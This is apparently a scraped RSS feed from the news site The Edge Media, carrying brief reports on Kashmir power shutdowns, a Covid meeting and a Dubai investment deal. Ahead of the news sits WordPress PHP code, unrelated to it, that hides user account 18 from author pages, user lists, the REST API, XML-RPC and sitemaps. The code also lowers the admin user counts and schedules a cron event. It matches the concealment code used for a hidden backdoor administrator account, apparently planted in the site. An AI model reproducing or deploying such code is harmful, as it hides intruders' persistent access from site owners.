add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Power Supply To Remain Affected In Several Kashmir Areas Due To Maintenance appeared first on The Edge Media.
]]>According to KPDCL, maintenance work on a 33 kV line will lead to a power outage on January 4, 2026, from 9 am to 3 pm in parts of Pulwama district.
Areas likely to be affected include Tral, Dever, Pinglish, Dadasra, Chandrigam, Mandura, Khalil, Bajwani, Noor Pora, and nearby localities in south Kashmir.
In another instance, a shutdown of the 33 kV Tral Pehlu line tap line from Nowdal will be carried out on January 7 and January 11, 2026, between 9 am and 3 pm. During this period, electricity supply will remain disrupted in Tral I, Payeen, Dever, Pinglish, Chewa, Khalil, Tral Bala, Bajwani, and adjoining areas.
Similarly, the 33 kV Balhama Old TCI tap line from Khunmoh SIDCO I will be shut down on January 4, 2026, from 9 am to 3 pm. This will affect power supply in Wuyan, Balhama, Munpora, and surrounding localities.
KPDCL has also announced a shutdown of the 33 kV Pampore SIDCO line along with the 33 kV Pampore Pampore line on January 7, 2026, from 9 am to 3 pm. As a result, electricity supply will be affected in IE Khrew and the cement plant area, Wuyan, Pampore I and II, IE Wuyan, Nambalbal, Drangbal, Khadermoh, and nearby areas.
In north Kashmir, the 33 kV Handwara Old line will remain shut on January 4 from 10 am to 3 pm, leading to power disruption in Changimulla, Zachaldara, Wadipora, Adora, Hanga, Haril, Lach, Batagund, and adjoining localities.
Additionally, a shutdown of the 33 kV Pattan Amargarh line covering Pattan, Pahaln, and Hamray will be observed on January 6, 2026, from 10 am to 3 pm. During this period, electricity supply will be affected in Zangam, Nehalpora, Pattan, Hamray, Palhalan, hospital areas, Wanigam, and surrounding regions.
KPDCL has advised consumers in the affected areas to make necessary arrangements in advance and has expressed regret for the inconvenience caused due to these essential maintenance works.
The post Power Supply To Remain Affected In Several Kashmir Areas Due To Maintenance appeared first on The Edge Media.
]]>The post PM Modi to disscuss Covid situation with CMs appeared first on The Edge Media.
]]>The Covid related measures and situation will be discussed at 4:30 PM via video conferencing. While Reviewing the situation at the High-level meeting PM Modi called for ensuring an adequate amount of health infrastructure in every state at the district level along with accelerating vaccination drive, working in mission mode.
Public health response and state-specific scenarios will be discussed with CMs
The post PM Modi to disscuss Covid situation with CMs appeared first on The Edge Media.
]]>The post Dubai and India have agreed to collaborate on infrastructure development in Jammu and Kashmir appeared first on The Edge Media.
]]>
Following the abolition of Jammu and Kashmir’s special status and separation of the state into two Union Territories, Dubai, part of the United Arab Emirates, has signed the region’s first investment deal.
Dubai would create infrastructure such as industrial parks, IT towers, multi-purpose buildings, logistics centers, a medical college, and a specialty hospital, according to the government.
The post Dubai and India have agreed to collaborate on infrastructure development in Jammu and Kashmir appeared first on The Edge Media.
]]>